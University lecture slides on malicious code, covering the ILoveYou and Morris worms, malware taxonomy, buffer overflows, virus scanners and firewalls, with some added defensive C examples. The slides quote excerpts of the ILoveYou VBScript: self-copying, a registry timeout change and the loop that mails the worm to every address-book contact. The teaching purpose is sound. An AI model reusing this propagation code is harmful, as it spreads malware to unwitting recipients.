David Evans CS588: Cryptography University of Virginia Computer Science Lecture 20: Malicious Code.


David Evans
http://www.cs.virginia.edu/evans

CS588: Cryptography
University of Virginia
Computer Science

Lecture 20: Malicious Code

21 April 2005 University of Virginia CS 588 2

Menu

• Examination of ILoveYou Code

• Malicious Code Taxonomy

• Malcode Defenses Overview
  – Virus Scanners


LoveLetter.VBS

• This 328-line program caused ~$10B in damage

• How much work and smarts was required?

Main Loop

rem  barok -loveletter(vbe) <i hate go to school>
rem  by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
...
wscr.RegWrite "...Scripting Host\Settings\Timeout", 0
sub main()
...
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
...
spreadtoemail()
...
end sub

Smart virus writers don’t include their contact information.

Smart people would convey a more interesting message.

This was smart – turn off scripting timeout in registry. (Dumb for Microsoft.)

spreadtoemail (edited to fit)

sub spreadtoemail()
  for ctrlists=1 to mapi.AddressLists.Count
    set a=mapi.AddressLists(ctrlists)
    x=1
    for ctrentries=1 to a.AddressEntries.Count
      malead=a.AddressEntries(x)
      set male=out.CreateItem(0)
      male.Recipients.Add(malead)
      male.Subject = "ILOVEYOU"
      male.Body = "kindly check the attached LOVELETTER coming from me."
      male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
      male.Send
      x=x+1
    next
  next
end sub

Smart virus writers understand for loops.

Smart virus writers can spell “mail”.

Be Very Afraid...

• When really dumb people with no resources write malicious programs, it costs $10B.
• What would happen if smart people with resources wrote a malicious program?
  – Paper link: Staniford, Paxson & Weaver, How to 0wn the Internet in Your Spare Time (2002)
• “Warhol worm”: 15 minutes to 0wn Internet

Attacking Malicious Code

• “Malicious Code” is a bad name
  – Code has no intent
  – Programmer’s intent doesn’t matter, what the code does matters
• As networks get more programmable, accidentally harmful code will become common
• We’ll use “malcode” (mal = bad)
  – It’s not a great name either...

Taxonomy of Code

All Code
  Malcode
    Created by Malicious Author
    Accidental
  Harmless Code

(occasionally programs are actually useful, too)

Taxonomy of Malcode [Stallings, p. 502]

Malcode
  Requires Host Program: Trap Doors, Logic Bombs, Trojan Horses, Viruses
  Independent: Worms, Insiders
  Self-Replicating: Viruses, Worms

Worms and Viruses

• People get into stupid arguments over whether something is a “worm” or a “virus”
  – Is the Internet a host program?
    • See Mark W. Eichin and Jon A. Rochlis, With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988
  – Is Outlook a host program for an email?
• Similarly, for worms/viruses/Trojans
  – If the user must open it (e.g., ILoveYou), is it self-replicating?

Trojan Horses

• Greeks and Trojans at war – Eris (Discord), Paris, Aphrodite, Helen
• Greeks attacking Troy, bombarded city for 10 years, but couldn’t get through city walls.
• Pretended to leave, left big wooden horse as gift
• Trojans brought horse into city (had to tear down part of wall to do this), got silly drunk celebrating victory.
• Greeks jumped out, killed sentries, and let in Greek army.

Modern Trojan Horses

• User runs program that looks harmless
  – Program pretends to be “cool, dancing bears”, also erases your hard drive
• Most attacks today are Trojan Horses
  – ILoveYou, Melissa, recent Microsoft attack, etc.
• Rely on modern humans being as dumb as mythical Trojans
  – No matter how good your city/fire walls are, they don’t do any good if you can’t stop users from running random code


Differences between Morris Worm 1988 and Melissa/ILoveYou 1999

Vulnerabilities Exploited

• Morris Worm:
  – Buffer overflow: fingerd uses gets
  – sendmail debug mode
  – Weak Unix passwords
• Melissa:
  – Word enables macros by default, no limitations on macro behavior
• ILoveYou:
  – Dumb people will run code attached to email
• Code Red/Nimda:
  – Buffer overflow in IIS

Buffer Overflows

  char s[64];
  ...
  int i;
  ...
  int k;
  gets (s);

Stack frame: locals (s[64], i, k), saved Frame Pointer, Return Address

Input more than 64 bits: gets just writes down stack
  bit 65: address of bit 66 on stack
  bits 66-...: instructions
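The slide's gets(s) has no length argument, so everything past the end of s lands on the stack. As an added example (my own code, not from the lecture), here is a bounded line reader in C that stores at most 63 bytes into the same 64-byte buffer, always NUL-terminates, and skips the rest of an over-long line so the tail is not mistaken for the next input; the function names and the constructed 100-byte input are my own.

```c
#include <stddef.h>
#include <string.h>

#define BUF_LEN 64   /* same size as the slide's char s[64] */

/* Bounded replacement for gets(). *cursor points into a NUL-terminated input
 * stream (standing in for stdin). Stores at most cap-1 bytes of the current
 * line in buf, always NUL-terminates, and skips the rest of an over-long line
 * so the leftover bytes are not returned as the *next* line (a common fgets()
 * mistake). Returns the number of bytes stored, or -1 when no input is left.
 * *truncated is set to 1 when bytes beyond the buffer were dropped: exactly the
 * input that, under gets(), would have overwritten i, the saved frame pointer
 * and the return address. */
int read_line(const char **cursor, char *buf, size_t cap, int *truncated) {
    const char *p = *cursor;
    size_t n = 0;
    *truncated = 0;
    if (cap == 0 || *p == '\0') return -1;
    for (; *p != '\0' && *p != '\n'; p++) {
        if (n + 1 < cap)
            buf[n++] = *p;
        else
            *truncated = 1;
    }
    buf[n] = '\0';
    *cursor = (*p == '\n') ? p + 1 : p;   /* consume the newline, never past NUL */
    return (int)n;
}

/* Demo on constructed input (not a real capture): a 100-byte line of 'A'
 * followed by a short line. Returns 1 when both lines are handled correctly. */
int demo(void) {
    char s[BUF_LEN];
    char input[128];
    const char *cur = input;
    int trunc, first, second;
    memset(input, 'A', 100);
    memcpy(input + 100, "\nshort\n", 8);   /* 8 bytes copies the NUL too */
    first = read_line(&cur, s, sizeof s, &trunc);   /* 63 bytes kept, 37 dropped */
    if (first != 63 || trunc != 1) return 0;
    second = read_line(&cur, s, sizeof s, &trunc);  /* "short", nothing dropped */
    if (second != 5 || trunc != 0 || strcmp(s, "short") != 0) return 0;
    return read_line(&cur, s, sizeof s, &trunc) == -1;  /* input exhausted */
}

int main(void) {
    return demo() == 1 ? 0 : 1;
}
```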

Preventing Buffer Overflows

• Use run-time checks on all memory references
  – Safe languages (CLU, Java, Eiffel, etc.)
  – Safe libraries for C (don’t use gets, strcpy, etc.)
• Obfuscation
  – Randomize locations in memory
• Separate code and data segments
  – Make code segment unwritable (once application loaded), only allow jumps in code segment
• Static analysis
  – Check binary or source code
• But – about ½ of recent vulnerabilities are still buffer overflows!

Replication Strategy

• Morris Worm
  – Searched .forward files (should have used .rhosts) to find other hosts to attack
  – Used password guessing to break into other accounts
  – Used fingerd, sendmail vulnerabilities
• Melissa/ILoveYou
  – Emails itself to entries in victim’s Outlook address book

Damage

• Morris Worm
  – Infected ~6000 computers (10% of Internet)
• Melissa
  – Infected 1.2 Million machines in a few hours
• ILoveYou
  – $10 Billion in damage
• Theorized worst case worm
  – ~$50B (Nicholas Weaver and Vern Paxson, A Worst-Case Worm, WEIS 2004)

Outcomes

• Internet Worm (Robert Morris, Jr.)
  – 3 years suspended sentence (no jail time), $10,000 fine.
  – Current occupation
• Melissa (David Smith) (~$80m damages)
  – Pleaded guilty, Dec 1999 (second successful prosecution of virus author), link to plea agreement on manifest
  – Hired by Rutgers as Computer Technician while awaiting sentencing
• ILoveYou ($10B damages)
  – Released without penalty, no laws in Philippines

Responses

• Morris Worm
  – Disconnect from network
  – Disorganized, phone
    • Anonymous message (probably from Robert Morris) explaining how to disable virus was not noticed or distributed
  – DARPA established CERT
• Melissa
  – CERT Advisory, Eradicated quickly
    • But CERT had to rebuild Web server
• ILoveYou
  – Many countries have since passed laws, Europe treaty announced last week


Malcode Defenses

1. Prevent malcode from running

2. Limit damage it can do

3. Discourage attackers

Malcode Defenses

1. Prevent malcode from running
   Virus scanners – recognize known malcode
   Firewalls – drop incoming packets
   Code signing (only run code from trusted sources)
   Education – make users smarter
2. Limit damage it can do
   Sandbox (“Playpen”) – run malcode in protected virtual machine
   Reference monitors – enforce policy on execution
   Intrusion Detection, System maintenance
3. Discourage attackers
   Legal – pass laws to penalize attackers

Today / Tuesday


Virus Scanners

Virus Scanners

• Compare code to a database of known malicious code
  – Smart authors create self-mutating viruses
  – Smart virus scanners try to deal with this (but usually fail)
• Reasonably useful in days of “sneaker” net (viruses spread on floppies)
• Reasonably useless when viruses spread as fast as email

Virus Spreading

• Read email every hour
• Everyone’s address book contains 50 people
• Infects 300M people in 6 hours!

[Chart: people infected (0 to 350,000,000) after hours 1 through 6]
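The chart's numbers follow from a simple compounding model. As an added example (my own code, not the lecture's), here it is in C with the slide's parameters: 50 address-book entries per user, mail read once an hour, and a population of 300M; starting from one infected user, the saturation term and the rounding to whole people are my assumptions to keep the count from exceeding the population.

```c
/* Compound spread model behind the chart. Each hour every infected user's mailer sends
 * the virus to `fanout` address-book entries; the factor (1 - infected/population) is the
 * chance that a recipient is still uninfected, so growth is ~fanout-fold per hour at first
 * and flattens as the population saturates. Starts from one infected user and returns the
 * number infected after `hours`, never exceeding `population`. */
long long infected_after(int hours, int fanout, long long population) {
    long long infected = 1;
    for (int h = 0; h < hours && infected < population; h++) {
        double uninfected = 1.0 - (double)infected / (double)population;
        /* rounded to the nearest whole person without needing libm */
        long long fresh = (long long)((double)infected * fanout * uninfected + 0.5);
        infected = (fresh >= population - infected) ? population : infected + fresh;
    }
    return infected;
}

/* First hour by which everybody is infected, or 0 if that does not happen within max_hours. */
int hours_to_saturate(int fanout, long long population, int max_hours) {
    for (int h = 1; h <= max_hours; h++)
        if (infected_after(h, fanout, population) >= population) return h;
    return 0;
}

int main(void) {
    /* The slide's parameters: 50 contacts per address book, 300M users, mail read hourly. */
    return hours_to_saturate(50, 300000000LL, 6) == 5 ? 0 : 1;
}
```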

Code Red

What Virus Scanner Peddlers Do (2001)

http://security.norton.com/

First, it tells you to lower your security settings to allow ActiveX.


Always Click “Yes”

During the download, you might see one or more messages asking if it is OK to download and run these programs. Click Yes when these messages appear.

What Virus Scanner Peddlers Do (Today)

What it Should Do

• Tell people who have ActiveX turned off, “Good Job”

• Tell people who click “OK” to run their scanner (which accesses every byte on their disk) without checking its certificate that they are very vulnerable and should get an education!

Malcode Defenses

1. Prevent malcode from running
   Virus scanners – recognize known malcode
   Firewalls – drop incoming packets
   Code signing (only run code from trusted sources)
   Education – make users smarter
2. Limit damage it can do
   Sandbox (“Playpen”) – run malcode in protected virtual machine
   Reference monitors – enforce policy on execution
   Intrusion Detection, System maintenance
3. Discourage attackers
   Legal – pass laws to penalize attackers

The Best Firewall

[Diagram: a computer with its two cables, “to network” and “power”]

Functionality is Bad

Lesser Firewall

[Diagram: a firewall between the computer and the cable “to network”]

firewall (p: packet) {
  if (allow (p)) forward (p);
  else drop (p);
}

Networks – OSI Model

Layer          Examples
Application    FTP SMTP HTTP RealPlayer ...
Presentation
Session
Transport      TCP UDP
Network        IP
Data Link      Ethernet FDDI CDMA Smoke Signals
Physical       Other

An IP (V4) Packet (bit offsets)

  0  IP Version (4) | IP Header Length | Type of Service (not used)
 16  Size of Datagram
 32  Packet Identification
 48  Flags | Fragment Offset
 64  TTL | Transport Protocol (e.g., TCP)
 80  Header Checksum
 96  Source IP Address
128  Destination IP Address
160  Options | Data

A Simple Packet Filter

boolean allow (packet) {
  if (match (packet.source, “18.26.4.*”))
    return false;   // No packets from Robert Morris’ machines.
  else if (match (packet.source, “149.150.209.*”))
    return false;   // Cheaton Hall
  else
    return true;
}
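Putting the IP packet slide and this filter together, here is an added example in C (my own code, not the lecture's) that parses the header fields from raw bytes, rejects malformed headers by checking the version, header length and RFC 791 checksum before trusting packet.source, and then applies the slide's two rules; the /24 reading of the "*" patterns, the struct and function names, and the constructed sample header are my assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
struct ipv4_hdr {                                /* fields named as on the packet slide, host byte order */
    uint8_t  version, header_len, ttl, protocol; /* header_len in bytes (IHL * 4) */
    uint16_t total_len, ident, checksum;
    uint32_t src, dst;
};
#define IP4(a, b, c, d) (((uint32_t)(a) << 24) | ((uint32_t)(b) << 16) | ((uint32_t)(c) << 8) | (uint32_t)(d))
static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p) { return ((uint32_t)rd16(p) << 16) | rd16(p + 2); }

/* Ones'-complement sum of the header's 16-bit words, folded to 16 bits (RFC 791). */
static uint16_t ones_sum(const uint8_t *p, size_t hlen) {
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < hlen; i += 2) sum += rd16(p + i);
    while (sum >> 16) sum = (sum & 0xFFFF) + (sum >> 16);
    return (uint16_t)sum;
}

/* Parse a header from raw bytes: 0 on success, -1 if malformed (too short, not version 4,
 * IHL < 5, bad checksum). A filter must drop those rather than guess at packet.source. */
int parse_ipv4(const uint8_t *p, size_t len, struct ipv4_hdr *h) {
    if (len < 20 || (p[0] >> 4) != 4) return -1;
    size_t hlen = (size_t)(p[0] & 0x0F) * 4;
    if (hlen < 20 || hlen > len || ones_sum(p, hlen) != 0xFFFF) return -1;
    h->version = 4; h->header_len = (uint8_t)hlen;
    h->total_len = rd16(p + 2); h->ident = rd16(p + 4);
    h->ttl = p[8]; h->protocol = p[9]; h->checksum = rd16(p + 10);
    h->src = rd32(p + 12); h->dst = rd32(p + 16);
    return 0;
}

/* The slide's allow(): "18.26.4.*" and "149.150.209.*" read as /24 prefixes. */
int allow(const struct ipv4_hdr *h) {
    uint32_t net = h->src >> 8;
    if (net == (IP4(18, 26, 4, 0) >> 8)) return 0;       /* No packets from Robert Morris' machines. */
    if (net == (IP4(149, 150, 209, 0) >> 8)) return 0;   /* Cheaton Hall */
    return 1;
}

/* Constructed sample header (not a capture): IHL 5, 20-byte TCP packet, TTL 64, with a
 * correct checksum so that parse_ipv4()'s validation is exercised. */
void build_ipv4(uint8_t out[20], uint32_t src, uint32_t dst) {
    memset(out, 0, 20);
    out[0] = 0x45; out[3] = 20; out[8] = 64; out[9] = 6;
    for (int i = 0; i < 4; i++) { out[12 + i] = (uint8_t)(src >> (24 - 8 * i)); out[16 + i] = (uint8_t)(dst >> (24 - 8 * i)); }
    uint16_t csum = (uint16_t)~ones_sum(out, 20);
    out[10] = (uint8_t)(csum >> 8); out[11] = (uint8_t)csum;
}
```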

Typical Packet Filtering Rules

Incoming:
  permit 0.0.0.0 128.143.137.19 TCP src >= 1024 dst = 25
  permit 0.0.0.0 128.143.137.19 TCP src = 25 dst >= 1024

Outgoing:
  permit 128.143.137.19 0.0.0.0 TCP src = 25 dst >= 1024
  permit 128.143.137.19 0.0.0.0 TCP src >= 1024 dst = 25

Packet Filter Layers

Layer          Examples
Application    FTP SMTP HTTP RealPlayer ...
Presentation
Session
Transport      TCP UDP
Network        IP
Data Link      Ethernet FDDI CDMA Smoke Signals
Physical       Other


Application-Layer Gateways

• Analyze communication at application layer

• All communication must go through a proxy that knows about application

• Able to detect application-level attacks

• Poor scalability, performance

• Fail-safe is annoying

Malcode on the Near Horizon

• Cell Phones
  – Billions of them worldwide, becoming as complex as computers were in 1988
  – About 60% run Symbian OS
• Cabir (November 2004) – spread using Bluetooth (short range networking) on Symbian OS (but required user agreement)
• CommWarrior (March 2005) – spread using phone network (multimedia messages), contact list
• Today: spread limited – only 2% of phones are “smartphones” (this will change soon!)

Malcode Summary

• Best defense is education
• Next best defense is a good offense
  – Tough legal penalties for convicted attackers
  – Doesn’t work against motivated foreign governments
• Some Technical Defenses
  – Virus Scanners
  – Tuesday:
    • Reference Monitors, Proof-Carrying Code
    • Firewalls, Intrusion Detection

Charge

• Project Presentations will be final class: Tuesday, May 3
• Normal project expectation:
  – Your team will make a presentation on May 3 (up to 15 minutes, can be as short as 5)
  – You will hand in a paper report on May 3
  – You will put up a web page (that could just be the same as your paper report)
• Take home final out May 3, due May 7
  – Some public-key cryptosystems questions
  – Something involving hash chains
  – One essay question (security analysis)